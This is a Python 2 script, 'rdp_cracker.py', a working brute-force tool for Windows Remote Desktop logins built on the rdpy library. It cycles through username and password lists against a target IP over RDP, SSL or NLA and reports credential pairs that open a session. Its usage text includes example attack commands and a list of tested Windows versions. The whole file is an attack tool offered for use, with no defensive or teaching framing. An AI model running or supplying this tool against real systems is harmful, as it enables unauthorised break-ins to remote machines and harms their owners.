rdp_cracker.py

#!/usr/bin/python

# need: Python 2.7 + pip install rdpy

import sys, os, getopt

import twisted.python.log as twisted_log
from twisted.internet import reactor

import rdpy.core.log as rdpy_log
from rdpy.protocol.rdp import rdp
from rdpy.core.error import RDPSecurityNegoFail

class RDPTestFactory(rdp.ClientFactory):
    def __init__(self, reactor, security, i, u, p, t):
        self._reactor = reactor
        self._security = security
        self._i = i
        self._u = u
        self._p = p
        self._t = t

    def clientConnectionLost(self, connector, reason):
        global g_Cracked
        if reason.type == RDPSecurityNegoFail:
            print ""
            print reason.type
            self._reactor.stop()
        if 0 == g_Cracked and 1 == do_crack():
            print "\n"+'Done.'
            self._reactor.stop()

    def clientConnectionFailed(self, connector, reason):
        print "\n"+"[clientConnectionFailed]"
        self._reactor.stop()

    def buildObserver(self, controller, addr):

        class TestObserver(rdp.RDPClientObserver):
            def __init__(self, controller, reactor, i, u, p, t):
                rdp.RDPClientObserver.__init__(self, controller)
                self._controller = controller
                self._reactor = reactor
                self._i = i
                self._u = u
                self._p = p
                self._t = t
                self._startTimeout = False

            def onReady(self):
                global g_count_onReady
                g_count_onReady += 1

            def onSessionReady(self):
                global g_arg_win2003
                global g_Cracked
                if 0 == g_arg_win2003 or (1 == g_arg_win2003 and 2 == g_count_onReady):
                    print "\nFound!!! "+self._i+":"+self._u+":"+self._p
                    g_Cracked = 1
                    self._controller.close();
                    self._reactor.stop()
                else:
                    pass

            def onClose(self):
                global g_count_onReady
                g_count_onReady = 0

            def onUpdate(self, destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, isCompress, data):
                if not self._startTimeout:
                    self._startTimeout = True
                    self._reactor.callLater(self._t, self.checkUpdate)

            def checkUpdate(self):
                self._controller.close();

        controller.setUsername(self._u)
        controller.setPassword(self._p)
        controller.setSecurityLevel(self._security)

        return TestObserver(controller, self._reactor, self._i, self._u, self._p, self._t)

def do_crack():

    global g_arg_username
    global g_arg_password
    global g_arg_user_file
    global g_arg_pass_file
    global g_arg_timeout
    global g_arg_mode
    global g_arg_verbose

    global g_arg_target_ip
    global g_arg_target_port

    global g_array_usernames
    global g_index_usernames
    global g_array_passwords
    global g_index_passwords

    if g_index_usernames >= len(g_array_usernames):
        return 1 # finish

    if g_index_passwords < len(g_array_passwords):
        u = g_array_usernames[g_index_usernames][:-1]
        p = g_array_passwords[g_index_passwords][:-1]
        if 1 == g_arg_verbose:
            print "* "+g_arg_target_ip+":"+u+":"+p
        else:
            sys.stdout.write('*')
            sys.stdout.flush()
        reactor.connectTCP(g_arg_target_ip, int(g_arg_target_port), RDPTestFactory(reactor, g_arg_mode, g_arg_target_ip, u, p, g_arg_timeout), g_arg_timeout)
        g_index_passwords += 1

    if g_index_passwords >= len(g_array_passwords):
        g_index_passwords = 0
        g_index_usernames += 1

    return 0 # doing

'''
setSecurityLevel:
    rdp.SecurityLevel.RDP_LEVEL_RDP = 0
    rdp.SecurityLevel.RDP_LEVEL_SSL = 1
    rdp.SecurityLevel.RDP_LEVEL_NLA = 2
'''

def help():
    print "Usage: python rdp_cracker.py [options] IP[:port (default: 3389)]"
    print "\t-h: help"

def longhelp():
    print "--------------------------------------------"
    print "--- RDP Cracker v2.0 (leng_que@20151211) ---"
    print "--------------------------------------------"
    print "Usage: python rdp_cracker.py [options] IP[:port (default: 3389)]"
    print "\t-h: help"
    print "\t-u USER: username (default: administrator)"
    print "\t-p PASS: password (default: 123456)"
    print "\t-U FILE: username file"
    print "\t-P FILE: password file"
    print "\t-t SECONDS: connect max timeout seconds (default: 3)"
    print "\t-m MODE: connect mode 0:RDP 1:SSL 2:NLA (default: 2)"
    print "\t-v: verbose"
    print "\t--win2003: indicate the target OS is Windows Server 2003"
    print ""
    print "Example:"
    print "python rdp_cracker.py 192.168.0.2"
    print "python rdp_cracker.py -u administrator -p 123456 -t 3 -m 2 192.168.0.2"
    print "python rdp_cracker.py -U users.lst -P 3389.dic -m 1 -v 192.168.0.3"
    print "python rdp_cracker.py -P 3389.dic -t 6 -m 0 --win2003 192.168.0.203"
    print ""
    print "Tested:"
    print "WindowsXP SP3"
    print "Windows7 SP1"
    print "Windows Server 2003 SP2"
    print "Windows Server 2008 R2"

def main():

    global g_arg_username
    global g_arg_password
    global g_arg_user_file
    global g_arg_pass_file
    global g_arg_timeout
    global g_arg_mode
    global g_arg_verbose
    global g_arg_win2003

    global g_arg_target_ip
    global g_arg_target_port

    global g_array_usernames
    global g_index_usernames
    global g_array_passwords
    global g_index_passwords

    try:
        opts, args = getopt.getopt(sys.argv[1:], "hu:p:U:P:t:m:v", ["win2003"])
    except getopt.GetoptError:
        help()
        sys.exit()

    for opt, arg in opts:
        if opt == "-h":
            longhelp()
            sys.exit()
        elif opt == "-u":
            g_arg_username = arg
        elif opt == "-p":
            g_arg_password = arg
        elif opt == "-U":
            g_arg_user_file = arg
        elif opt == "-P":
            g_arg_pass_file = arg
        elif opt == "-t":
            g_arg_timeout = int(arg)
        elif opt == "-m":
            g_arg_mode = int(arg)
        elif opt == "-v":
            g_arg_verbose = 1
        elif opt == "--win2003":
            g_arg_win2003 = 1

    if len(args) == 0:
        help()
        sys.exit()
    elif ':' in args[0]:
        g_arg_target_ip, g_arg_target_port = args[0].split(':')
    else:
        g_arg_target_ip, g_arg_target_port = args[0], "3389"

    if 1 == g_arg_verbose:
        print ("[u:%s]"%(g_arg_username))
        print ("[p:%s]"%(g_arg_password))
        print ("[U:%s]"%(g_arg_user_file))
        print ("[P:%s]"%(g_arg_pass_file))
        print ("[t:%s]"%(g_arg_timeout))
        print ("[m:%s]"%(g_arg_mode))
        print ("[win2003:%s]"%(g_arg_win2003))

        print ("[IP:%s]"%(g_arg_target_ip))
        print ("[port:%s]"%(g_arg_target_port))

    if len(g_arg_user_file) > 0:
        f = open(g_arg_user_file, 'rU')
        g_array_usernames = f.readlines()
        f.close()
    if len(g_array_usernames) <= 0:
        g_array_usernames.append(g_arg_username+"\n")

    if len(g_arg_pass_file) > 0:
        f = open(g_arg_pass_file, 'rU') # great! compatible osx/linux/windows \r \n \r\n
        g_array_passwords = f.readlines()
        f.close()
    if len(g_array_passwords) <= 0:
        g_array_passwords.append(g_arg_password+"\n")

    print "running..."

    if 0 == do_crack():
        reactor.run()
    else:
        print 'Done.'

if __name__ == '__main__':
    rdpy_log._LOG_LEVEL = rdpy_log.Level.NONE
    twisted_log.startLoggingWithObserver(None,None)

    g_arg_username = 'administrator'
    g_arg_password = '123456'
    g_arg_user_file = ''
    g_arg_pass_file = ''
    g_arg_timeout = 3
    g_arg_mode = 2
    g_arg_verbose = 0
    g_arg_win2003 = 0

    g_arg_target_ip = None
    g_arg_target_port = None

    g_array_usernames = []
    g_index_usernames = 0
    g_array_passwords = []
    g_index_passwords = 0

    g_count_onReady = 0
    g_Cracked = 0

    main()